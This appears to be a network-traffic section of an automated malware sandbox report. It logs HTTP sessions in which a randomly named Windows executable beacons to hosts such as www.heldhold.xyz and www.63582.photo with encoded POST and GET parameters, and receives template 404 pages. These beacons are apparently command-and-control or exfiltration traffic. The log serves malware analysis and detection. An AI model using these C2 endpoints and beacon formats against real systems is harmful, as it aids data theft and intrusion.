                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 26, 2024 15:23:25.262027979 CEST | 1236 | IN | Data Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL -->
                                              Sep 26, 2024 15:23:25.262186050 CEST | 448 | IN | Data Raw: 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e 20 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="ju-loading-scre
                                              Sep 26, 2024 15:23:25.262192011 CEST | 1236 | IN | Data Raw: 74 68 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 20 66 61 62 6c 65 73 2d 74 6f 70 2d 68 65 61 64 65 72 2d 73 69 67 6e 69 6e 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 20 20 20
                                              Data Ascii: th-background-color fables-top-header-signin"> <div class="container"> <div class="row" id="top-row"> <div class="col-12 col-sm-2 col-lg-5"> <div class="dropdown"> <button class="btn bt
                                              Sep 26, 2024 15:23:25.262511969 CEST | 224 | IN | Data Raw: 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 70 68 6f 6e 65 22 3e 3c 2f 73 70 61
                                              Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconphone"></span> Phone : (888) 6000 6000 - (888) 6000 6000</p> </div> <div class="col-12 col-sm-5 col-lg-3 text-right">
                                              Sep 26, 2024 15:23:25.262516975 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 74 68 69 72 64 2d 74 65 78 74 2d 63 6f 6c 6f 72 20 66 6f 6e 74 2d 31 33 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 66 61 62 6c 65 73 2d 69 63 6f 6e 65 6d 61 69 6c 22 3e 3c 2f 73
                                              Data Ascii: <p class="fables-third-text-color font-13"><span class="fables-iconemail"></span> Email: Design@domain.com</p> </div> </div> </div></div> ... /End Top Header -->... Start Fables Navigation --><
                                              Sep 26, 2024 15:23:25.262528896 CEST | 224 | IN | Data Raw: 61 62 6c 65 73 2d 6e 61 76 22 3e 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6e 61 76 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 22 3e 0a
                                              Data Ascii: ables-nav"> <li class="nav-item dropdown"> <a class="nav-link dropdown-toggle" href="#" id="sub-nav1" data-toggle="dropdown" aria-haspopup="true"
                                              Sep 26, 2024 15:23:25.262662888 CEST | 1236 | IN | Data Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                              Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                              Sep 26, 2024 15:23:25.262670994 CEST | 224 | IN | Data Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                              Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                              Sep 26, 2024 15:23:25.262681961 CEST | 1236 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22
                                              Data Ascii: <ul class="dropdown-menu"> <li><a class="dropdown-item" href="header1-transparent.html">Header 1 Transparent</a></li>
                                              Sep 26, 2024 15:23:25.267330885 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 64 61 72 6b 2e 68 74 6d 6c 22
                                              Data Ascii: <li><a class="dropdown-item" href="header2-dark.html">Header 2 Dark</a></li> </ul> </li>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              15 | 192.168.2.5 | 49726 | 67.223.117.189 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:27.226273060 CEST | 1806 | OUT | POST /fava/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.heldhold.xyz
                                              Origin: http://www.heldhold.xyz
                                              Content-Length: 1243
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.heldhold.xyz/fava/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Data Raw: 76 66 35 70 77 6e 3d 4c 41 72 35 71 39 4c 79 57 75 6f 35 4e 55 70 50 55 41 5a 39 43 76 65 45 63 50 59 67 2b 4c 51 58 47 34 47 52 46 51 42 34 73 6a 46 51 56 55 34 43 59 75 55 78 48 59 62 52 4a 6e 6e 68 6a 6f 77 77 33 4a 30 4e 66 43 77 4c 4a 35 49 4a 30 49 35 51 2f 4f 45 46 55 7a 51 4e 67 35 50 4c 4e 44 4f 62 6a 57 5a 47 6f 67 49 6e 37 45 64 54 49 4e 31 51 4d 5a 71 43 46 36 77 36 78 7a 36 6a 47 50 4a 52 78 63 47 59 66 72 63 36 58 66 58 67 59 4b 30 78 35 78 71 76 43 44 44 42 4f 72 66 36 4b 6c 63 6d 62 38 57 61 76 54 47 55 70 6f 68 2b 52 2f 45 4e 30 47 61 2f 41 72 63 56 54 35 75 67 31 5a 6c 46 79 51 53 30 5a 59 51 71 47 36 79 75 42 63 68 4b 68 79 6b 4f 69 76 79 47 2b 4b 7a 2b 32 61 6d 59 72 43 51 44 39 30 50 6c 35 43 45 65 7a 65 6e 79 49 4f 61 71 66 36 49 76 33 4a 37 68 4d 6e 65 50 74 34 39 55 65 67 68 35 50 39 6b 6d 62 49 63 4d 5a 33 37 4a 41 58 77 58 53 6b 5a 38 5a 6c 6a 6d 39 72 6b 67 4b 30 56 6e 58 58 7a 58 4a 6a 52 42 59 6c 42 4b 6c 50 5a 5a 38 6d 53 6d 50 35 78 39 4d 70 70 6e 48 50 70 50 38 49 6e [TRUNCATED]
                                              Data Ascii: vf5pwn=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 [TRUNCATED]
                                              Sep 26, 2024 15:23:27.824871063 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:23:27 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 26, 2024 15:23:27.824929953 CEST | 224 | IN | Data Raw: 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63
                                              Data Ascii: rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ...
                                              Sep 26, 2024 15:23:27.824939966 CEST | 1236 | IN | Data Raw: 20 4f 57 4c 20 43 41 52 4f 55 53 45 4c 20 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22
                                              Data Ascii: OWL CAROUSEL --> <link href="assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="
                                              Sep 26, 2024 15:23:27.825109005 CEST | 1236 | IN | Data Raw: 69 64 3d 22 6a 75 2d 6c 6f 61 64 69 6e 67 2d 73 63 72 65 65 6e 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20
                                              Data Ascii: id="ju-loading-screen"> <div class="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color
                                              Sep 26, 2024 15:23:27.825119972 CEST | 1236 | IN | Data Raw: 2f 69 6d 61 67 65 73 2f 46 72 61 6e 63 65 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: /images/France.png" alt="england flag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables
                                              Sep 26, 2024 15:23:27.825129986 CEST | 672 | IN | Data Raw: 72 22 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 64 61 74 61 2d 74 6f 67 67 6c 65 3d 22 63 6f 6c 6c 61 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74
                                              Data Ascii: r" type="button" data-toggle="collapse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-
                                              Sep 26, 2024 15:23:27.825408936 CEST | 1236 | IN | Data Raw: 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 20
                                              Data Ascii: aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                              Sep 26, 2024 15:23:27.825419903 CEST | 1236 | IN | Data Raw: 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63
                                              Data Ascii: toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                              Sep 26, 2024 15:23:27.825428963 CEST | 448 | IN | Data Raw: 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: ader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                              Sep 26, 2024 15:23:27.825692892 CEST | 1236 | IN | Data Raw: 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 20
                                              Data Ascii: > <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                              Sep 26, 2024 15:23:27.829912901 CEST | 1236 | IN | Data Raw: 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 64
                                              Data Ascii: ></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              16 | 192.168.2.5 | 49727 | 67.223.117.189 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:30.856440067 CEST | 523 | OUT | GET /fava/?lHul=nfQTqL40vDEpIp30&vf5pwn=GCDZpLqdSYk7fT5BaAxVCvWfN8QL3LUdfdSMH3wAhEJHSlsoeLITVJbnCwS/lbUV+KMqaRxHJZIr2IJ0lKwQAngPiIKVJBW1l0NVsB5cz1lTXdEnKbnDfocvymGyGvQBrQ== HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.heldhold.xyz
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
                                              Sep 26, 2024 15:23:31.454011917 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                              Date: Thu, 26 Sep 2024 13:23:31 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 32106
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
                                              Sep 26, 2024 15:23:31.454024076 CEST | 1236 | IN | Data Raw: 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73
                                              Data Ascii: strap.min.css" rel="stylesheet"> <link href="assets/vendor/bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL
                                              Sep 26, 2024 15:23:31.454035997 CEST | 1236 | IN | Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 67 2d 74 72 61 6e 73 70 61 72 65 6e 74 20 74 65 78 74 2d 77 68 69 74 65 22 3e
                                              Data Ascii: <button type="submit" class="btn bg-transparent text-white"> <i class="fas fa-search"></i> </button> </div> </div> </form> </div> </div>... Loading Screen --><div id="
                                              Sep 26, 2024 15:23:31.454246998 CEST | 1236 | IN | Data Raw: 6d 67 20 73 72 63 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 65 6e 67 6c 61 6e 64 2e 70 6e 67 22 20 61 6c 74 3d 22 65 6e 67 6c 61 6e 64 20 66 6c 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 45 6e 67 6c 69 73 68
                                              Data Ascii: mg src="assets/custom/images/england.png" alt="england flag" class="mr-1"> English</a> <a class="dropdown-item white-color font-13 fables-second-hover-color" href="#"> <img src="assets/custom/ima
                                              Sep 26, 2024 15:23:31.454258919 CEST | 896 | IN | Data Raw: 22 3e 0a 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 62 72 61 6e 64 20 70 6c 2d 30 22 20 68 72 65 66 3d 22 69 6e 64 65 78 2e
                                              Data Ascii: "> <a class="navbar-brand pl-0" href="index.html"><img src="assets/custom/images/fables-logo.png" alt="Fables Template" class="fables-logo"></a> <button class="navbar-toggler" t
                                              Sep 26, 2024 15:23:31.454364061 CEST | 1236 | IN | Data Raw: 68 61 73 70 6f 70 75 70 3d 22 74 72 75 65 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: haspopup="true" aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
                                              Sep 26, 2024 15:23:31.454370975 CEST | 1236 | IN | Data Raw: 2d 69 74 65 6d 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: -item dropdown-toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
                                              Sep 26, 2024 15:23:31.454401970 CEST | 448 | IN | Data Raw: 2d 69 74 65 6d 22 20 68 72 65 66 3d 22 68 65 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: -item" href="header2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
                                              Sep 26, 2024 15:23:31.455368042 CEST | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d
                                              Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
                                              Sep 26, 2024 15:23:31.455512047 CEST | 1236 | IN | Data Raw: 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                              Data Ascii: ader 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>
                                              Sep 26, 2024 15:23:31.459045887 CEST | 1236 | IN | Data Raw: 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 63 6c 61 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 6d 65 6e 75 22 3e 20
                                              Data Ascii: rs</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Footer 1</a>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              17 | 192.168.2.5 | 49728 | 103.248.137.209 | 80 | 2556 | C:\Program Files (x86)\pxTetnvzAqfngzxdJleqlHZcbxcmKnXFSvAiPCvpGdyMKAizQhrXJTABFMLhmSrbNFDH\YKkstfciYBQ.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Sep 26, 2024 15:23:37.112127066 CEST | 766 | OUT | POST /5o7d/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Accept-Encoding: gzip, deflate
                                              Host: www.63582.photo
                                              Origin: http://www.63582.photo
                                              Content-Length: 207
                                              Content-Type: application/x-www-form-urlencoded
                                              Cache-Control: no-cache
                                              Connection: close
                                              Referer: http://www.63582.photo/5o7d/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.4 Safari/537.36
